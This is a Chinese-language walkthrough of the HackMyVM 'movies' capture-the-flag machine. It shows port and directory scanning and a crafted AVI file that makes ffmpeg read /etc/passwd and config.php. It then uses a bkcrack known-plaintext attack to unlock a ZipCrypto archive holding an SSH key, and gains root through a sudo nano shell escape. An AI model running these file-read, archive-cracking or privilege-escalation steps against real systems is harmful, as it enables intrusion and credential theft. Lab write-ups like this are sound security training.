hack-my-vm-movies

端口扫描

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.178.99                                                                                [18:49:18]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 18:49 CST
Nmap scan report for 192.168.178.99
Host is up (0.039s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:29:BB:50 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

kali@kali [~] ➜  sudo nmap -sT -sC -sV -O -p22,80 192.168.178.99                                                                                 [18:49:49]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 18:50 CST
Nmap scan report for 192.168.178.99
Host is up (0.00068s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 e7:c1:40:66:c0:be:c8:86:dd:58:21:4a:03:76:78:12 (RSA)
|   256 86:9f:0d:8f:f1:e0:62:90:65:cf:79:ee:5e:e3:12:01 (ECDSA)
|_  256 2a:e0:ac:89:49:dd:e5:3a:8f:47:36:7a:2f:07:11:b8 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: movie.hmv
|_http-server-header: Apache/2.4.54 (Debian)
MAC Address: 08:00:27:29:BB:50 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds

先去80端口做信息收集

端口渗透

kali@kali [~] ➜  dirb http://192.168.178.99                                                                                                      [18:50:25]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Mar 23 18:51:28 2025
URL_BASE: http://192.168.178.99/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.178.99/ ----
==> DIRECTORY: http://192.168.178.99/data/                                                                                                                 
==> DIRECTORY: http://192.168.178.99/dist/                                                                                                                 
+ http://192.168.178.99/index.php (CODE:200|SIZE:552)                                                                                                      
+ http://192.168.178.99/server-status (CODE:403|SIZE:279)                                                                                                  
+ http://192.168.178.99/sitemap.xml (CODE:200|SIZE:762)                                                                                                    
                                                                                                                                                           
---- Entering directory: http://192.168.178.99/data/ ----
==> DIRECTORY: http://192.168.178.99/data/dist/                                                                                                            
+ http://192.168.178.99/data/index.php (CODE:302|SIZE:0)                                                                                                   
                                                                                                                                                           
---- Entering directory: http://192.168.178.99/dist/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                           
---- Entering directory: http://192.168.178.99/data/dist/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Mar 23 18:51:40 2025
DOWNLOADED: 9224 - FOUND: 4

发现两个目录，扫一下看下面有啥文件：

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.178.99/data -x php,html  [18:53:07]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.178.99/data
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/login.php            (Status: 200) [Size: 449]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/dist                 (Status: 301) [Size: 320] [--> http://192.168.178.99/data/dist/]
/404.html             (Status: 200) [Size: 920]

这个data目录收获了index.php和config.php，我们先看看

kali@kali [~] ➜  curl http://192.168.178.99/data/config.php                                                                                      [18:56:44]
kali@kali [~] ➜ 

这个是空页面，去登录界面看看

界面没有sql注入，也没有弱密码，尝试均无果，先放弃，去看看另外一个目录

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.178.99/dist -x php,html  [18:49:17]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.178.99/dist
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/img                  (Status: 301) [Size: 319] [--> http://192.168.178.99/dist/img/]
/css                  (Status: 301) [Size: 319] [--> http://192.168.178.99/dist/css/]
/js                   (Status: 301) [Size: 318] [--> http://192.168.178.99/dist/js/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]

没有有用的收获，只能去主界面看看了

一个只能让我们上传.avi文件的功能，一个linux系统，处理.avi文件到.mp4文件，大概率是在终端使用ffmpeg这个工具，那我们可以将恶意代码嵌入avi文件中，达成ssrf漏洞，使用工具是SSRF-Testing/ffmpeg/gen_avi.py at master · cujanovic/SSRF-Testing

kali@kali [~/Desktop] ➜  python gen_avi.py file:///etc/passwd passwd.avi                                [19:09:09]
kali@kali [~/Desktop] ➜  cat passwd.avi                                                                 [19:09:19]
RIFFAVI LISThdrlavih8@�}��LISTtstrlstrh8txts}�'��strf((��XVIDHLIST    movi00tx�GAB2#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:1.0,
#EXT-X-BYTERANGE: 0
file:////usr/share/doc/gnupg/Upgrading_From_PGP.txt
#EXTINF:1.0,
file:///etc/passwd
#EXT-X-ENDLIST00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd00dcd% 

可以看到，我们的代码是被嵌入进去了，接下来我们上传即可

必须是上面的类型，然后我们下载打开返回的MP4文件即可

拿到一个用户名，我记得前面还有一个配置文件，config.php，我们如法炮制

拿到账号密码后，我尝试ssh登录，没有结果，只能去登录我们前面发现的页面了，在上面click me出下载了一个压缩包

kali@kali [~] ➜  7z x mydata_archive.zip                                                                [19:20:32]

7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
 64-bit locale=zh_CN.UTF-8 Threads:128 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 7731 bytes (8 KiB)

Extracting archive: mydata_archive.zip
--
Path = mydata_archive.zip
Type = zip
Physical Size = 7731

    
Would you like to replace the existing file:
  Path:     ./404.html
  Size:     919 bytes (1 KiB)
  Modified: 2022-09-28 14:09:09
with the file from archive:
  Path:     404.html
  Size:     919 bytes (1 KiB)
  Modified: 2022-09-28 14:09:09
? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? y

               
Enter password (will not be echoed):

尝试解包，但是要密码，我们查看一下里面有的文件

kali@kali [~] ➜  7z l mydata_archive.zip                                                                [19:21:39]


7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
 64-bit locale=zh_CN.UTF-8 Threads:128 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 7731 bytes (8 KiB)

Listing archive: mydata_archive.zip

--
Path = mydata_archive.zip
Type = zip
Physical Size = 7731

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2022-09-28 14:09:09 .....          919          931  404.html
2022-10-01 14:53:29 .....          552          564  home.html
2022-09-25 20:59:17 .....         2602         2614  id_rsa
2022-09-30 14:10:26 .....          143          155  index.php
2022-10-01 14:59:12 .....          762          774  sitemap.xml
2022-10-01 14:24:29 .....         1881         1893  upload.php
------------------- ----- ------------ ------------  ------------------------
2022-10-01 14:59:12               6859         6931  6 files

有私钥，还有一个html文件

kali@kali [~] ➜  7z l -slt mydata_archive.zip | grep "^Method ="                                        [19:22:42]

Method = ZipCrypto Store
Method = ZipCrypto Store
Method = ZipCrypto Store
Method = ZipCrypto Store
Method = ZipCrypto Store
Method = ZipCrypto Store

压缩算法都是同一个，这种压缩算法是可以明文攻击的，我们只要知道其中一个文件的一部分数据即可，那肯定选html文件啊，是有固定格式的，攻击脚本https://github.com/kimci86/bkcrack/releases/download/v1.5.0/bkcrack-1.5.0-Linux.tar.gz

kali@kali [~] ➜  echo -n '<!DOCTYPE html>' > x   

不要换行符

kali@kali [~] ➜  xxd x                                                                                  [19:25:16]
00000000: 3c21 444f 4354 5950 4520 6874 6d6c 3e    <!DOCTYPE html>
kali@kali [~] ➜  7z a x.zip x                                                                           [19:26:55]

7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
 64-bit locale=zh_CN.UTF-8 Threads:128 OPEN_MAX:1024

Open archive: x.zip
--
Path = x.zip
Type = zip
Physical Size = 151

Scanning the drive:
1 file, 15 bytes (1 KiB)

Updating archive: x.zip

Add new data to archive: 1 file, 15 bytes (1 KiB)

    
Files read from disk: 1
Archive size: 151 bytes (1 KiB)
Everything is Ok

kali@kali [~] ➜  ./Desktop/bkcrack-1.5.0-Linux/bkcrack -C mydata_archive.zip -c 404.html -P x.zip -p x  [19:27:26]
bkcrack 1.5.0 - 2022-07-07
[19:28:19] Z reduction using 8 bytes of known plaintext
100.0 % (8 / 8)
[19:28:20] Attack on 761980 Z values at index 6
Keys: d706e724 da372a68 a79864b0
0.8 % (6048 / 761980)
[19:28:31] Keys
d706e724 da372a68 a79864b0
kali@kali [~] ➜  ./Desktop/bkcrack-1.5.0-Linux/bkcrack -C mydata_archive.zip -k d706e724 da372a68 a79864b0 -U rock.zip 123
bkcrack 1.5.0 - 2022-07-07
[19:28:47] Writing unlocked archive rock.zip with password "123"
100.0 % (6 / 6)
Wrote unlocked archive.

kali@kali [~] ➜ 7z x rock.zip  

输入我们设置的密码123即可

kali@kali [~] ➜  ssh -i id_rsa  tarantino@192.168.178.99                                                [19:29:36]
Linux movie.hmv 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 23 11:15:05 2025 from 192.168.178.141
tarantino@movie:~$ 

tarantino@movie:~$ sudo -l
Matching Defaults entries for tarantino on movie:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tarantino may run the following commands on movie:
    (root) NOPASSWD: /usr/bin/nano /etc/passwd

sudo /usr/bin/nano /etc/passwd
^R^X
reset; sh 1>&0 2>&0

提权很简单，但是我尝试写入一个新的用户，没成功